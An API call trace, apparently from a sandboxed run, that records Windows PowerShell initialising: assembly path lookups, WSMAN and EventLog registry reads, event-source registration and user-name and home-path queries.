	[0205.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0205.100] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0205.101] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0205.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0205.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x27cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0206.533] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.533] CoTaskMemFree (pv=0x506ed0) 
	[0206.534] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.534] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.534] CoTaskMemFree (pv=0x506ed0) 
	[0206.536] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.536] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.536] CoTaskMemFree (pv=0x506ed0) 
	[0206.537] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.537] CoTaskMemFree (pv=0x506ed0) 
	[0206.548] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.548] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.548] CoTaskMemFree (pv=0x506ed0) 
	[0206.553] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.553] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.553] CoTaskMemFree (pv=0x506ed0) 
	[0206.554] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0206.554] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0206.554] CoTaskMemFree (pv=0x506ed0) 
	[0207.239] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d238 | out: phkResult=0x27d238*=0x1c8) returned 0x0
	[0207.245] RegQueryInfoKeyW (in: hKey=0x1c8, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d13c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d138*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0207.245] CoTaskMemFree (pv=0x0) 
	[0207.246] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0207.246] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x0, lpValueName=0x4e89c0, lpcchValueName=0x27d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x27d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0207.246] CoTaskMemFree (pv=0x4e89c0) 
	[0207.246] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0207.246] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x1, lpValueName=0x4e89c0, lpcchValueName=0x27d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x27d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0207.246] CoTaskMemFree (pv=0x4e89c0) 
	[0207.246] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0207.246] RegEnumValueW (in: hKey=0x1c8, dwIndex=0x2, lpValueName=0x4e89c0, lpcchValueName=0x27d1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x27d1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0207.246] CoTaskMemFree (pv=0x4e89c0) 
	[0207.248] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d1cc, lpData=0x0, lpcbData=0x27d1c8*=0x0 | out: lpType=0x27d1cc*=0x1, lpData=0x0, lpcbData=0x27d1c8*=0x8) returned 0x0
	[0207.248] CoTaskMemAlloc (cb=0xc) returned 0x1b79d320
	[0207.248] RegQueryValueExW (in: hKey=0x1c8, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d19c, lpData=0x1b79d320, lpcbData=0x27d198*=0x8 | out: lpType=0x27d19c*=0x1, lpData="2.0", lpcbData=0x27d198*=0x8) returned 0x0
	[0207.248] CoTaskMemFree (pv=0x1b79d320) 
	[0210.169] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d188 | out: phkResult=0x27d188*=0x1cc) returned 0x0
	[0210.170] RegQueryInfoKeyW (in: hKey=0x1cc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d08c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d08c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d088*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.170] CoTaskMemFree (pv=0x0) 
	[0210.170] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0210.170] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x0, lpValueName=0x4e89c0, lpcchValueName=0x27d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x27d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0210.170] CoTaskMemFree (pv=0x4e89c0) 
	[0210.170] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0210.170] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x1, lpValueName=0x4e89c0, lpcchValueName=0x27d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x27d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0210.170] CoTaskMemFree (pv=0x4e89c0) 
	[0210.170] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0210.170] RegEnumValueW (in: hKey=0x1cc, dwIndex=0x2, lpValueName=0x4e89c0, lpcchValueName=0x27d138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x27d138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0210.170] CoTaskMemFree (pv=0x4e89c0) 
	[0210.170] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d11c, lpData=0x0, lpcbData=0x27d118*=0x0 | out: lpType=0x27d11c*=0x1, lpData=0x0, lpcbData=0x27d118*=0x8) returned 0x0
	[0210.170] CoTaskMemAlloc (cb=0xc) returned 0x1b79d240
	[0210.170] RegQueryValueExW (in: hKey=0x1cc, lpValueName="StackVersion", lpReserved=0x0, lpType=0x27d0ec, lpData=0x1b79d240, lpcbData=0x27d0e8*=0x8 | out: lpType=0x27d0ec*=0x1, lpData="2.0", lpcbData=0x27d0e8*=0x8) returned 0x0
	[0210.170] CoTaskMemFree (pv=0x1b79d240) 
	[0210.171] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0210.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.171] CoTaskMemFree (pv=0x506ed0) 
	[0210.175] CoTaskMemAlloc (cb=0x104) returned 0x506ed0
	[0210.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ed0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0210.175] CoTaskMemFree (pv=0x506ed0) 
	[0210.789] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1b8 | out: phkResult=0x27d1b8*=0x324) returned 0x0
	[0210.794] RegQueryInfoKeyW (in: hKey=0x324, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d12c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d128*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.795] CoTaskMemFree (pv=0x0) 
	[0210.795] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0210.795] RegEnumKeyExW (in: hKey=0x324, dwIndex=0x0, lpName=0x4e89c0, lpcchName=0x27d1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x27d1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0210.809] RegOpenKeyExW (in: hKey=0x324, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d218 | out: phkResult=0x27d218*=0x338) returned 0x0
	[0210.809] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d218 | out: phkResult=0x27d218*=0x0) returned 0x2
	[0210.809] RegOpenKeyExW (in: hKey=0x324, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d218 | out: phkResult=0x27d218*=0x33c) returned 0x0
	[0210.809] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d218 | out: phkResult=0x27d218*=0x340) returned 0x0
	[0210.809] RegCloseKey (hKey=0x340) returned 0x0
	[0210.809] RegCloseKey (hKey=0x324) returned 0x0
	[0210.810] RegCloseKey (hKey=0x33c) returned 0x0
	[0210.824] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0210.824] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0211.429] CoTaskMemFree (pv=0x56f200) 
	[0211.430] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0211.430] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0211.431] CoTaskMemFree (pv=0x4e89c0) 
	[0218.133] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d168 | out: phkResult=0x27d168*=0x344) returned 0x0
	[0218.262] RegQueryInfoKeyW (in: hKey=0x344, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x27d0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x27d0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x27d0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x0, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x1, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x2, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x3, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x4, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x5, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.262] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.262] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x6, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.262] CoTaskMemFree (pv=0x4e89c0) 
	[0218.262] CoTaskMemFree (pv=0x0) 
	[0218.263] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.263] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x7, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.263] CoTaskMemFree (pv=0x4e89c0) 
	[0218.263] CoTaskMemFree (pv=0x0) 
	[0218.263] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0218.263] RegEnumKeyExW (in: hKey=0x344, dwIndex=0x8, lpName=0x4e89c0, lpcchName=0x27d168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x27d168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0218.263] CoTaskMemFree (pv=0x4e89c0) 
	[0218.263] CoTaskMemFree (pv=0x0) 
	[0218.263] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x348) returned 0x0
	[0218.263] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x2
	[0218.263] RegOpenKeyExW (in: hKey=0x344, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x34c) returned 0x0
	[0218.263] RegOpenKeyExW (in: hKey=0x34c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x2
	[0218.263] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x350) returned 0x0
	[0218.263] RegOpenKeyExW (in: hKey=0x350, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x2
	[0218.263] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x354) returned 0x0
	[0218.263] RegOpenKeyExW (in: hKey=0x354, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x2
	[0218.263] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x358) returned 0x0
	[0218.263] RegOpenKeyExW (in: hKey=0x358, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x2
	[0218.264] RegOpenKeyExW (in: hKey=0x344, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x35c) returned 0x0
	[0218.264] RegOpenKeyExW (in: hKey=0x35c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x2
	[0218.264] RegOpenKeyExW (in: hKey=0x344, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x27d1c8 | out: phkResult=0x27d1c8*=0x0) returned 0x5
	[0218.288] RegisterEventSourceW (lpUNCServerName=".", lpSourceName="PowerShell") returned 0x1b880008
	[0219.012] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x306b878*="WSMan", lpRawData=0x306b5e8) returned 1
	[0219.015] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.015] CoTaskMemFree (pv=0x506ba0) 
	[0219.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.030] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.031] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0219.031] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0219.031] CoTaskMemFree (pv=0x56f200) 
	[0219.031] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0219.031] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0219.031] CoTaskMemFree (pv=0x4e89c0) 
	[0219.032] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec37e0*="Alias", lpRawData=0x2ec3570) returned 1
	[0219.037] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.037] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.037] CoTaskMemFree (pv=0x506ba0) 
	[0219.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x27cc20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0219.039] CoTaskMemAlloc (cb=0x804) returned 0x56f200
	[0219.039] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x56f200, nSize=0x27d428 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x27d428) returned 0x1
	[0219.039] CoTaskMemFree (pv=0x56f200) 
	[0219.039] CoTaskMemAlloc (cb=0x204) returned 0x4e89c0
	[0219.039] GetUserNameW (in: lpBuffer=0x4e89c0, pcbBuffer=0x27d468 | out: lpBuffer="aETAdzjz", pcbBuffer=0x27d468) returned 1
	[0219.040] CoTaskMemFree (pv=0x4e89c0) 
	[0219.040] ReportEventW (hEventLog=0x1b880008, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2ec8d88*="Environment", lpRawData=0x2ec8b18) returned 1
	[0219.046] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0219.046] CoTaskMemFree (pv=0x506ba0) 
	[0219.047] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.047] GetEnvironmentVariableW (in: lpName="HOMEDRIVE", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0219.047] CoTaskMemFree (pv=0x506ba0) 
	[0219.047] CoTaskMemAlloc (cb=0x104) returned 0x506ba0
	[0219.047] GetEnvironmentVariableW (in: lpName="HOMEPATH", lpBuffer=0x506ba0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0219.047] CoTaskMemFree (pv=0x506ba0) 
	[0219.047] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz", nBufferLength=0x105, lpBuffer=0x27cfd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz", lpFilePart=0x0) returned 0x11
	[0219.048] SetErrorMode (uMode=0x1) returned 0x1
